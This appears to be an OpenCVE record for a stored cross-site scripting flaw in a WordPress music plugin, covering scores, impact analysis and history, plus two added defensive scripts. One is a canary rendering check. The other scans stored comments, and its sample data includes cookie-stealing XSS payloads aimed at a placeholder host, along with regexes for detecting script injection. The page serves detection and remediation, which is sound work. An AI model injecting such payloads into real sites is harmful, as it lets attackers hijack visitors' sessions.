Description
WordPress Sonaar Music Plugin 4.7 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the comment functionality. Attackers can submit JavaScript payloads in the comment parameter to wp-comments-post.php which are stored and executed in the browsers of users viewing the affected playlist pages.
Published: 2026-06-08
Score: 5.1 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross-site scripting flaw in Sonaar Music Plugin 4.7 for WordPress lets an attacker place JavaScript in the comment field of a playlist page. The payload is stored server-side and runs in the browser of every user who later views that page, logged-in editors and administrators included. Script running in the site's origin can issue authenticated requests on the viewer's behalf, read page content and any cookie not marked HttpOnly, deface the page, or redirect visitors to a phishing site, compromising the confidentiality and integrity of the visitor's browser context. Because WordPress sets its own authentication cookies HttpOnly by default, the more realistic harm on a stock install is the script acting as the viewer (for example, an administrator moderating comments) rather than outright cookie theft.

Affected Systems

The vulnerability affects installations of the Sonaar Music Plugin for WordPress running version 4.7, the only version named in the record; whether earlier or later releases share the flaw is not stated here. Any WordPress site with the plugin deployed and comments open on playlist pages is potentially impacted.

Risk and Exploitability

The headline 5.1 is the CVSS v4.0 base score (Medium). The record also carries a CVSS v3.1 vector that scores 7.2 (High), and the two disagree on preconditions: the v3.1 vector and the description say no privileges are required, while the v4.0 vector assumes a low-privileged account (PR:L) and a passive user interaction (UI:P). Plan exposure around the unauthenticated case until the vendor clarifies. No EPSS value is available. The issue is not in CISA KEV, which means no confirmed in-the-wild exploitation has been recorded there, not that none has occurred; the SSVC entry in the History section below records public proof-of-concept exploitation and marks the flaw as automatable. The attack itself is a single crafted POST to wp-comments-post.php, with no authentication required according to the description, so any site that accepts comments on playlist pages is reachable by anyone on the internet.

Generated by OpenCVE AI on June 8, 2026 at 03:51 UTC.
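A check a site owner or tester can run to confirm whether comment markup reaches a playlist page unencoded, written as an added example for this page rather than code from OpenCVE or the Sonaar plugin. The idea: submit a harmless canary comment (a bold element carrying a random data- attribute, no script) through the normal comment form, fetch the page that displays comments, and classify how the canary comes back. If it is parsed as a real element with its attribute intact, markup is emitted unescaped; if it is present only as text ("&lt;b ..."), output is being escaped; if it is absent, the comment is either not displayed yet or was stripped on input. The HTML bodies below are constructed samples standing in for the fetched page, and fetching the real page is left to the caller. Caveat: a bare <b> surviving is normal, because WordPress core allows a small set of tags in comments, but core's default comment filter (wp_kses with the comment allow-list) strips the data- attribute before storage, so a canary that comes back with the attribute intact means the plugin's comment path bypasses that filter or re-introduces unsafe content.

```python
"""Classify how a canary comment is rendered on a page.

Added example, not part of the OpenCVE page or the Sonaar plugin.
Outcomes:
  unescaped - canary parsed as a real <b> element with its data-canary
              attribute: comment markup is emitted raw (the condition the
              advisory describes)
  escaped   - canary present only as text ("&lt;b data-canary=...")
  absent    - not displayed (pending moderation) or stripped on input
"""
from html.parser import HTMLParser
import html
import secrets


def make_canary():
    """Harmless marker: a <b> element with a random data-canary value.

    No script is involved; the attribute is the tell, because core's comment
    allow-list permits <b> but not attributes on it.
    """
    token = secrets.token_hex(8)
    return token, f'<b data-canary="{token}">canary-{token}</b>'


class _CanaryFinder(HTMLParser):
    def __init__(self, token):
        super().__init__()  # convert_charrefs=True: entities are decoded in text
        self.token = token
        self.as_element = False  # canary parsed as a real tag
        self.as_text = False     # canary present only as escaped text

    def handle_starttag(self, tag, attrs):
        if tag == "b" and ("data-canary", self.token) in attrs:
            self.as_element = True

    def handle_data(self, data):
        # Escaped markup reaches us as plain text once entities are decoded.
        if f'<b data-canary="{self.token}"' in data:
            self.as_text = True


def classify_rendering(page_html, token):
    """Return 'unescaped', 'escaped' or 'absent' for the canary token."""
    finder = _CanaryFinder(token)
    finder.feed(page_html)
    finder.close()
    if finder.as_element:
        return "unescaped"
    if finder.as_text:
        return "escaped"
    return "absent"


def sample_pages(token, canary):
    """Constructed page fragments (not captures from a real site).

    The first is what a template that echoes comment_content raw produces;
    the second is the same comment after HTML escaping at output.
    """
    vulnerable = f'<ul class="comments"><li class="comment">{canary}</li></ul>'
    fixed = f'<ul class="comments"><li class="comment">{html.escape(canary)}</li></ul>'
    return vulnerable, fixed


if __name__ == "__main__":
    token, canary = make_canary()
    vulnerable, fixed = sample_pages(token, canary)
    print("vulnerable template:", classify_rendering(vulnerable, token))  # unescaped
    print("escaping template:  ", classify_rendering(fixed, token))       # escaped
```

Against a live site, post the canary string returned by make_canary() as the comment body, fetch the playlist page that lists comments, and pass the response body to classify_rendering(); the same canary should be tested after any plugin update to confirm the fix. Remove the canary comment afterwards.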

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Sonaar Music Plugin as soon as the vendor publishes a release that addresses this issue; no fixed version is named on this page, so confirm the fix in the vendor's changelog rather than assuming a later version is safe
  • Until then, close comments on playlist pages, or hold all comments for moderation so unreviewed content is never displayed to visitors, and audit comments already stored for injected markup
  • Make sure comment content is escaped or passed through WordPress's kses allow-list (wp_kses_post or the core comment filters) at output, and deploy a Content Security Policy as defense in depth; CSP limits what an injected script can do but does not sanitize anything
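The audit step in the list above, as an added example written for this page rather than code from OpenCVE or the Sonaar plugin. After a stored XSS in comment content the first incident-response question is what is already sitting in wp_comments, so this scans the comment_content column for constructs that execute or load script when emitted unescaped and lists the rows a reviewer should look at. The table and rows are constructed in an in-memory SQLite database so the script runs offline; against a live site the same SELECT runs on the real wp_comments table (the prefix may differ). The patterns are a triage heuristic, not a parser: they will flag some benign text and miss obfuscated payloads, so a human still reviews each hit.

```python
"""Triage stored WordPress comments for injected script payloads.

Added example, not code from OpenCVE or the Sonaar plugin. Rows are
constructed sample data, not from a real incident.
"""
import html
import re
import sqlite3

# Constructs that execute or load script when a template emits them raw.
# Each pattern is checked on the stored text and again after entity decoding,
# because some templates decode stored entities before output.
PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(
        r"\bon(?:error|load|click|dblclick|mouse[a-z]+|pointer[a-z]+|key[a-z]+"
        r"|focus[a-z]*|blur|input|change|submit|toggle|animation[a-z]*"
        r"|transition[a-z]*|begin|end|wheel|scroll)\s*=", re.I),
    "javascript_uri": re.compile(
        r"(?:href|src|action|formaction|xlink:href)\s*=\s*['\"]?\s*javascript:", re.I),
    "embedding_tag": re.compile(
        r"<\s*(?:iframe|object|embed|svg|math|frame|link|meta|base)\b", re.I),
    "data_html_uri": re.compile(r"data:text/html", re.I),
}


def indicators(content):
    """Map each matching pattern name to 'raw' or 'entity-encoded'.

    'raw' means the construct is stored as-is and executes if output is not
    escaped; 'entity-encoded' means it only becomes live if the template
    decodes entities before output (lower confidence, still worth a look).
    """
    decoded = html.unescape(content)
    found = {}
    for name, rx in PATTERNS.items():
        if rx.search(content):
            found[name] = "raw"
        elif rx.search(decoded):
            found[name] = "entity-encoded"
    return found


def scan_comments(conn, table="wp_comments"):
    """Return [(comment_ID, comment_author_IP, indicators)] for suspicious rows."""
    sql = f"SELECT comment_ID, comment_author_IP, comment_content FROM {table}"
    hits = []
    for cid, ip, content in conn.execute(sql):
        found = indicators(content)
        if found:
            hits.append((cid, ip, found))
    return hits


def safe_preview(content, limit=80):
    """Escaped, truncated form so a report or terminal never re-renders the payload."""
    return html.escape(content[:limit])


# Constructed sample rows (IPs from documentation ranges, hosts under .invalid).
SAMPLE_ROWS = [
    (1, "203.0.113.10", "Great track, love the mix!"),
    (2, "203.0.113.11", "<b>bold</b> is allowed by WordPress and is harmless"),
    (3, "198.51.100.7", '<script>document.location="https://example.invalid/?c="+document.cookie</script>'),
    (4, "198.51.100.8", "<img src=x onerror=\"fetch('https://example.invalid/'+document.cookie)\">"),
    (5, "198.51.100.9", "&lt;svg onload=alert(1)&gt;"),
    (6, "203.0.113.12", 'Check <a href="https://example.com/">this</a> out'),
]


def build_sample_db():
    """In-memory stand-in for wp_comments with only the columns the scan needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_comments ("
        "comment_ID INTEGER PRIMARY KEY, comment_author_IP TEXT, comment_content TEXT)")
    conn.executemany("INSERT INTO wp_comments VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


if __name__ == "__main__":
    conn = build_sample_db()
    for cid, ip, found in scan_comments(conn):
        summary = ", ".join(f"{name} ({how})" for name, how in found.items())
        print(f"comment {cid} from {ip}: {summary}")
        row = conn.execute(
            "SELECT comment_content FROM wp_comments WHERE comment_ID = ?", (cid,)).fetchone()
        print("    ", safe_preview(row[0]))
```

Flagged rows should be unapproved or deleted and their comment_author_IP values checked against the web server log for the matching POST to wp-comments-post.php, which gives the time window for when the site was serving the payload.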

Advisories

No advisories yet.

History

Mon, 08 Jun 2026 11:30:00 +0000

  Type: Metrics
  Values removed: (none)
  Values added: ssvc
    {'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 08 Jun 2026 02:00:00 +0000

  Type: Description
  Values removed: (none)
  Values added: WordPress Sonaar Music Plugin 4.7 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the comment functionality. Attackers can submit JavaScript payloads in the comment parameter to wp-comments-post.php which are stored and executed in the browsers of users viewing the affected playlist pages.

  Type: Title
  Values removed: (none)
  Values added: WordPress Sonaar Music Plugin 4.7 Stored XSS via Comments

  Type: Weaknesses
  Values removed: (none)
  Values added: CWE-79

  Type: References
  Values removed: (none)
  Values added: (none listed)

  Type: Metrics
  Values removed: (none)
  Values added: cvssV3_1
    {'score': 7.2, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}
  cvssV4_0
    {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-06-08T11:01:45.212Z

Reserved: 2026-01-10T01:51:52.987Z

Link: CVE-2023-54351

Vulnrichment

Updated: 2026-06-08T11:01:41.159Z

NVD

Status: Received

Published: 2026-06-08T02:16:22.950

Modified: 2026-06-08T02:16:22.950

Link: CVE-2023-54351

Red Hat

No data.

OpenCVE Enrichment

Updated: 2026-06-08T04:00:06Z

Weaknesses